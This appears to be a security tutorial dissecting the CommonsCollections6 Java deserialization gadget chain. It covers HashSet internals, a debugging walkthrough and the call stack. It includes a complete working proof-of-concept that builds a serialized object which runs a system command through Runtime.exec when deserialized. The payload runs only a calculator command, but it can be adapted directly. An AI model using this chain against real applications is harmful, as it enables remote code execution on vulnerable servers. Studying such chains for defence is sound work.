Preface
CommonsCollections Gadget Chain | CommonsCollections Version | JDK Version | Note |
---|---|---|---|
CommonsCollections1 | CommonsCollections 3.1 - 3.2.1 | 1.7 (fixed and no longer exploitable after 8u71) | |
CommonsCollections2 | CommonsCollections 4.0 | no restriction so far | javassist |
CommonsCollections3 | CommonsCollections 3.1 - 3.2.1 | 1.7 (fixed and no longer exploitable after 8u71) | javassist |
CommonsCollections4 | CommonsCollections 4.0 | no restriction so far | javassist |
CommonsCollections5 | CommonsCollections 3.1 - 3.2.1 | 1.8 8u76 (also verified on 8u181) | |
CommonsCollections6 | CommonsCollections 3.1 - 3.2.1 | no restriction so far | |
Because CC6 has no JDK version restriction, it is frequently used by exploitation tools when building command-execution payloads. Comparing the PoC with CC5, the difference lies in the deserialization entry point: CC5 enters through BadAttributeValueExpException.readObject(), while CC6 enters through HashSet.readObject().
Background
Let's take a closer look at the HashSet class. Building the chain mainly involves the one-argument constructor HashSet(int), the overridden readObject method, and the add method.
HashSet(int initialCapacity) sets the initial capacity of the backing HashMap:
/**
* Constructs a new, empty set; the backing <tt>HashMap</tt> instance has
* the specified initial capacity and default load factor (0.75).
*
* @param initialCapacity the initial capacity of the hash table
* @throws IllegalArgumentException if the initial capacity is less
* than zero
*/
public HashSet(int initialCapacity) {
map = new HashMap<>(initialCapacity);
}
add()
Delegates to the backing HashMap's put method, so the element being added gets hashed:
public boolean add(E e) {
return map.put(e, PRESENT)==null;
}
readObject()
The key point is that, at the end, every deserialized element is re-inserted via map.put():
private void readObject(java.io.ObjectInputStream s)
throws java.io.IOException, ClassNotFoundException {
// Read in any hidden serialization magic
s.defaultReadObject();
// Read capacity and verify non-negative.
int capacity = s.readInt();
if (capacity < 0) {
throw new InvalidObjectException("Illegal capacity: " +
capacity);
}
// Read load factor and verify positive and non NaN.
float loadFactor = s.readFloat();
if (loadFactor <= 0 || Float.isNaN(loadFactor)) {
throw new InvalidObjectException("Illegal load factor: " +
loadFactor);
}
// Read size and verify non-negative.
int size = s.readInt();
if (size < 0) {
throw new InvalidObjectException("Illegal size: " +
size);
}
// Set the capacity according to the size and load factor ensuring that
// the HashMap is at least 25% full but clamping to maximum capacity.
capacity = (int) Math.min(size * Math.min(1 / loadFactor, 4.0f),
HashMap.MAXIMUM_CAPACITY);
// Constructing the backing map will lazily create an array when the first element is
// added, so check it before construction. Call HashMap.tableSizeFor to compute the
// actual allocation size. Check Map.Entry[].class since it's the nearest public type to
// what is actually created.
SharedSecrets.getJavaOISAccess()
.checkArray(s, Map.Entry[].class, HashMap.tableSizeFor(capacity));
// Create backing HashMap
map = (((HashSet<?>)this) instanceof LinkedHashSet ?
new LinkedHashMap<E,Object>(capacity, loadFactor) :
new HashMap<E,Object>(capacity, loadFactor));
// Read in all elements in the proper order.
for (int i=0; i<size; i++) {
@SuppressWarnings("unchecked")
E e = (E) s.readObject();
map.put(e, PRESENT);
}
}
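The important part is the final loop: each element read back is re-inserted with map.put(e, PRESENT), which hashes it again on the deserializing side. A self-contained sketch (again using a hypothetical Probe class, unrelated to Commons Collections) demonstrating that the hashCode of every element fires inside readObject:
import java.io.*;
import java.util.HashSet;

public class HashCodeOnReadObject {
    static class Probe implements Serializable {
        @Override
        public int hashCode() {
            System.out.println("hashCode() called");
            return 42;
        }
    }

    public static void main(String[] args) throws Exception {
        HashSet<Object> set = new HashSet<>(1);
        set.add(new Probe());                        // first call: during add()

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(set);
        oos.close();

        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bos.toByteArray()));
        ois.readObject();                            // second call: inside HashSet.readObject() -> map.put()
    }
}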
PoC Analysis
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
public class cc6 {
public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
// start with a harmless ChainedTransformer (empty array) so no command runs while building the object graph
Transformer Testtransformer = new ChainedTransformer(new Transformer[]{});
Transformer[] transformers=new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[]{}}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[]{}}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"open -a Calculator"})
};
Map map=new HashMap();
// LazyMap.get() on a missing key runs the transformer chain on that key
Map lazyMap=LazyMap.decorate(map,Testtransformer);
// TiedMapEntry.hashCode() -> getValue() -> lazyMap.get("test1")
TiedMapEntry tiedMapEntry=new TiedMapEntry(lazyMap,"test1");
HashSet hashSet=new HashSet(1);
// add() already calls tiedMapEntry.hashCode() once, which puts "test1" into the map
hashSet.add(tiedMapEntry);
// remove the key so LazyMap.get() takes the transform() branch again during deserialization
lazyMap.remove("test1");
// overwrite the original iTransformers via reflection, so the command is not executed locally during serialization
Field field = ChainedTransformer.class.getDeclaredField("iTransformers");
field.setAccessible(true);
field.set(Testtransformer, transformers);
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
objectOutputStream.writeObject(hashSet);
objectOutputStream.close();
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("test.out"));
objectInputStream.readObject();
}
}
Compared with CC5, the main change is the HashSet part: a HashSet with initial capacity 1 is created and the constructed TiedMapEntry is added to it, so the TiedMapEntry is wrapped in the HashSet that gets serialized. Note that hashSet.add() already triggers tiedMapEntry.hashCode() and thus lazyMap.get("test1") locally; that is why the PoC starts with an empty ChainedTransformer, removes the "test1" key afterwards, and only then swaps in the real transformer array via reflection. During deserialization, execution then enters HashSet's overridden readObject method.
Debugging Analysis
Set a breakpoint at HashSet#readObject and start debugging.
readObject calls HashMap's put method, and the argument e passed in is the TiedMapEntry object constructed in the PoC.
put then calls HashMap's hash method; keep stepping in.
hash calls the hashCode method of the key that was passed in. This key, as can be confirmed from the Variables panel or by tracing back through the PoC, is exactly the constructed TiedMapEntry object.
The hashCode call then invokes getValue, which triggers LazyMap.get(); that in turn enters the loop inside ChainedTransformer#transform, and the chained reflective calls finally execute the command.
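For reference, the relevant Commons Collections 3.x methods look roughly like this (abridged from the library source), which makes the hashCode() -> getValue() -> LazyMap.get() -> transform() path explicit:
// org.apache.commons.collections.keyvalue.TiedMapEntry (abridged)
public Object getValue() {
    return map.get(key);                        // map is the LazyMap, key is "test1"
}

public int hashCode() {
    Object value = getValue();                  // triggers LazyMap.get("test1")
    return (getKey() == null ? 0 : getKey().hashCode()) ^
           (value == null ? 0 : value.hashCode());
}

// org.apache.commons.collections.map.LazyMap (abridged)
public Object get(Object key) {
    if (map.containsKey(key) == false) {
        Object value = factory.transform(key);  // factory is the ChainedTransformer
        map.put(key, value);
        return value;
    }
    return map.get(key);
}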
In fact, once execution leaves HashMap#hash(), the rest of the chain is identical to CC5. The call stack is as follows:
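The original post shows the stack as a debugger screenshot; reconstructed from the PoC above, it is approximately:
ObjectInputStream.readObject()
    HashSet.readObject()
        HashMap.put()
            HashMap.hash()
                TiedMapEntry.hashCode()
                    TiedMapEntry.getValue()
                        LazyMap.get()
                            ChainedTransformer.transform()
                                ConstantTransformer.transform()
                                InvokerTransformer.transform()
                                    Method.invoke()
                                        Runtime.exec()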